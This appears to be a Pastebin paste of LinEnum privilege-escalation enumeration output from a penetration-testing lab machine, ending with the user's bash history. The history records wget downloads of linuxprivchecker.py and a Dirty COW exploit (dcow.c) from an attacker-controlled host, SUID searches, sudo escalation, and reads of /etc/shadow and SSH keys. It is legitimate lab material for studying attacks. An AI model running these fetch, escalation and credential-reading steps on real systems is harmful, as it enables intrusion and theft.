Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- bob@sufferance:/tmp$ bash linenum.sh
- #########################################################
- # Local Linux Enumeration & Privilege Escalation Script #
- #########################################################
- # www.rebootuser.com
- # version 0.91
- [-] Debug Info
- [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
- Scan started at:
- Wed Aug 8 03:55:57 EDT 2018
- ### SYSTEM ##############################################
- [-] Kernel information:
- Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
- [-] Kernel information (continued):
- Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
- [-] Hostname:
- sufferance
- ### USER/GROUP ##########################################
- [-] Current user/group info:
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Users that have previously logged onto the system:
- Username Port From Latest
- root tty1 Thu Jun 9 07:30:24 -0400 2016
- bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
- [-] Who else is logged on:
- 03:55:57 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- bob pts/0 10.11.0.86 03:14 37:01m 0.00s 0.00s -bash
- bob pts/1 10.11.0.86 03:21 2.00s 0.03s 0.02s bash linenum.sh
- [-] Group memberships:
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
- uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
- uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
- uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=1001(bob) gid=1001(bob) groups=1001(bob)
- [-] Contents of /etc/passwd:
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- Debian-exim:x:100:102::/var/spool/exim4:/bin/false
- statd:x:101:65534::/var/lib/nfs:/bin/false
- identd:x:102:65534::/var/run/identd:/bin/false
- sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
- bob:x:1001:1001::/home/bob:/bin/bash
- [-] Super user account(s):
- root
- [+] We can sudo without supplying a password!
- usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
- { -e file [...] | -i | -s | <command> }
- [+] We can read root's home directory!
- total 36K
- drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
- -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
- -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
- -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
- ---------- 1 root root 33 2015-02-27 19:33 proof.txt
- drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
- -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
- [-] Are permissions on /home directories lax:
- total 12K
- drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
- drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
- drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
- [-] Root is allowed to login via SSH:
- PermitRootLogin yes
- ### ENVIRONMENTAL #######################################
- [-] Environment information:
- SHELL=/bin/bash
- TERM=xterm-256color
- SSH_CLIENT=10.11.0.86 44278 22
- SSH_TTY=/dev/pts/1
- USER=bob
- PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
- MAIL=/var/mail/bob
- PWD=/tmp
- LANG=en_US.UTF-8
- HOME=/home/bob
- SHLVL=2
- LOGNAME=bob
- SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
- _=/usr/bin/env
- [-] Path information:
- /usr/local/bin:/usr/bin:/bin:/usr/games
- [-] Available shells:
- # /etc/shells: valid login shells
- /bin/csh
- /bin/sh
- /usr/bin/es
- /usr/bin/ksh
- /bin/ksh
- /usr/bin/rc
- /usr/bin/tcsh
- /bin/tcsh
- /usr/bin/esh
- /bin/bash
- /bin/rbash
- [-] Current umask value:
- u=rwx,g=rx,o=rx
- 0022
- [-] Password and storage information:
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ### JOBS/TASKS ##########################################
- [-] Cron jobs:
- -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
- /etc/cron.d:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.daily:
- total 56
- drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
- -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
- -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
- -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
- -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
- -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
- -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
- -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
- -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- /etc/cron.monthly:
- total 16
- drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
- /etc/cron.weekly:
- total 20
- drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
- -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
- -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
- [-] Crontab contents:
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- ### NETWORKING ##########################################
- [-] Network and IP info:
- eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
- inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
- inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:81845 errors:2 dropped:4 overruns:0 frame:0
- TX packets:27849 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:7177303 (6.8 MiB) TX bytes:4947482 (4.7 MiB)
- Interrupt:18 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:18 errors:0 dropped:0 overruns:0 frame:0
- TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
- [-] Nameserver(s):
- nameserver 10.11.1.220
- nameserver 10.11.1.221
- [-] Listening TCP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
- tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 2396 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
- tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
- [-] Listening UDP:
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.11.1.136:137 0.0.0.0:* -
- udp 0 0 0.0.0.0:137 0.0.0.0:* -
- udp 0 0 10.11.1.136:138 0.0.0.0:* -
- udp 0 0 0.0.0.0:138 0.0.0.0:* -
- ### SERVICES #############################################
- [-] Running processes:
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
- root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
- root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
- root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
- root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
- root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
- root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
- root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
- root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
- root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
- root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
- root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
- root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
- root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
- root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
- root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
- bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
- root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
- root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
- root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
- root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
- root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
- root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
- root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
- bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
- bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
- root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
- root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
- root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
- root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
- root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
- root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
- root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
- root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
- root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
- bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
- bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
- 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
- root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
- root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
- root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
- root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
- root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
- root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
- root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
- root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
- daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
- root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
- root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
- root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
- root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
- root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
- root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
- root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
- bob 2104 1.0 0.1 4568 1872 pts/1 S+ 03:55 0:00 bash linenum.sh
- bob 2105 1.0 0.1 4584 1508 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2107 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
- bob 2286 0.0 0.1 4584 1272 pts/1 R+ 03:55 0:00 bash linenum.sh
- bob 2287 0.0 0.0 3424 984 pts/1 R+ 03:55 0:00 ps aux
- [-] Process binaries and associated permissions (from above list):
- 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
- 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
- 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
- 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
- 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
- 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
- 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
- 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
- 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
- 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
- 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
- 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
- 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
- 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
- [-] Contents of /etc/inetd.conf:
- # /etc/inetd.conf: see inetd(8) for further informations.
- #
- # Internet superserver configuration database
- #
- #
- # Lines starting with "#:LABEL:" or "#<off>#" should not
- # be changed unless you know what you are doing!
- #
- # If you want to disable an entry so it isn't touched during
- # package updates just comment it out with a single '#' character.
- #
- # Packages should modify this file by using update-inetd(8)
- #
- # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
- #
- #:INTERNAL: Internal services
- #discard stream tcp nowait root internal
- #discard dgram udp wait root internal
- #daytime stream tcp nowait root internal
- #time stream tcp nowait root internal
- #:STANDARD: These are standard services.
- #:BSD: Shell, login, exec and talk are BSD protocols.
- #:MAIL: Mail, news and uucp services.
- #:INFO: Info services
- ident stream tcp wait identd /usr/sbin/identd identd
- #:BOOT: TFTP service is provided primarily for booting. Most sites
- # run this only on machines acting as "boot servers."
- #:RPC: RPC based services
- #:HAM-RADIO: amateur-radio services
- #:OTHER: Other services
- #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
- [-] The related inetd binary permissions:
- -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
- [-] /etc/init.d/ binary permissions:
- total 332
- drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
- drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
- -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
- -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
- -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
- -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
- -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
- -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
- -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
- -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
- -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
- -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
- -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
- -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
- -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
- -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
- -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
- -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
- -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
- -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
- -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
- -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
- -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
- -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
- -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
- -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
- -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
- -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
- -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
- -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
- -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
- -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
- -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
- -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
- -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
- -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
- -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
- -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
- -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
- -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
- -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
- -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
- -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
- -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
- -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
- -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
- -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
- -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
- -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
- -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
- -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
- -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
- -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
- -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
- -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
- -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
- -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
- -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
- -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
- -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
- -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
- -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
- ### SOFTWARE #############################################
- [-] Sudo version:
- Sudo version 1.6.8p12
- ### INTERESTING FILES ####################################
- [-] Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/gcc
- [-] Installed compilers:
- ii gcc 4.1.1-15 The GNU C compiler
- ii gcc-4.1 4.1.1-21 The GNU C compiler
- [-] Can we read/write sensitive files:
- -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
- -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
- -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
- -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
- [-] NFS config details:
- -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
- [-] Can't search *.conf files as no keyword was entered
- [-] Can't search *.php files as no keyword was entered
- [-] Can't search *.log files as no keyword was entered
- [-] Can't search *.ini files as no keyword was entered
- [-] All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
- -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
- -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
- -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
- -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
- -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
- -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
- -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
- -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
- -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
- -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
- -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
- -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
- -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
- -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
- -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
- -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
- -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
- -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
- -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
- [-] Current user's history files:
- -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
- [+] Root's history files are accessible!
- -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
- [-] Location and contents (if accessible) of .bash_history file(s):
- /home/bob/.bash_history
- exit
- exit
- exit
- ls
- cd ..
- ls
- cd ..
- ls
- cd usr
- ls
- cd bin
- ls
- ls
- cd ..
- ls
- cd ..
- ls
- cd var
- ls
- cd bak
- cd backups/
- ls
- cd ..
- ls
- cd /
- find . -exec file {} \; | grep -i elf
- /bin/sh -i
- ls
- id
- /bin/bash
- ls -l
- strings
- strings vmlinuz
- ls
- cd sbin
- ls
- ls -l
- cd ..
- ls
- cd home
- cd bob
- ls
- cd files
- ls
- cat *
- cd ..
- cd ..
- cd ..
- cd tmp
- ls
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.0.86:8000/linuxprivchecker.py
- python linuxprivchecker.py
- /bin/su
- /usr/bin
- ls
- cd /usr/bin
- ls
- strings at
- strings at
- strings at
- wget http://10.11.0.86:8000/dcow.c
- cd /tmp
- wget http://10.11.0.86:8000/dcow.c
- chmod +x dcow.c
- ./dcow.c
- id
- euid
- ps
- ps -eo pid,user,uid,args
- ps -eo pid,euid | grep YOUR_PID_HERE
- ps
- ps -eo pid,euid | grep 3623
- ps -eo pid,euid | grep 3620
- seteuid(0)
- ps -eo pid,euid | grep 3620
- ./dcow.c
- ./dcow.c
- ./dcow.c
- ./dcow.c
- $PATH
- echo $PATH
- echo $SHELL
- find / -perm -u=s -type f 2>/dev/null
- $PATH=/bin/su
- set $PATH = /bin/su
- echo $PATH
- export PATH="$PATH:/bin/su"
- echo $PATH
- whoami
- id
- ps
- /bin/bash
- ls
- id
- echo $PATH
- ps
- ps -eo pid,euid,ruid,suid | grep 375
- ps -eo pid,euid,ruid,suid | grep 677
- ps -eo pid,euid,ruid,suid | grep 3623
- ps -eo pid,euid,ruid,suid | grep 372
- sudo su
- /bin/su
- /bin.su
- /bin/h
- /bin/sh
- ls
- id
- whoami
- ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
- ls
- ls -l
- cd vmware-root/
- ls
- strings vmware-root/
- /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
- cd /usr/lib/vmware-tools/bin32/
- ls
- ls -l
- strings vmware-user-suid-wrapper
- chmod +x vmware-user-suid-wrapper
- ./vmware-user-suid-wrapper
- id
- whoami
- uid
- id
- sudo -l
- sudo -s
- ls
- cd files
- ls
- cd ~
- ls
- cd ..
- cd ..
- ls
- cd home
- ls
- cd .ssh
- cd bob
- cd .ssj
- cd .ssh
- ls
- cat authorized_keys
- cd ..
- cd ..
- ls
- cd ..
- ls
- cat /etc/passwd
- cat /etc/shadow
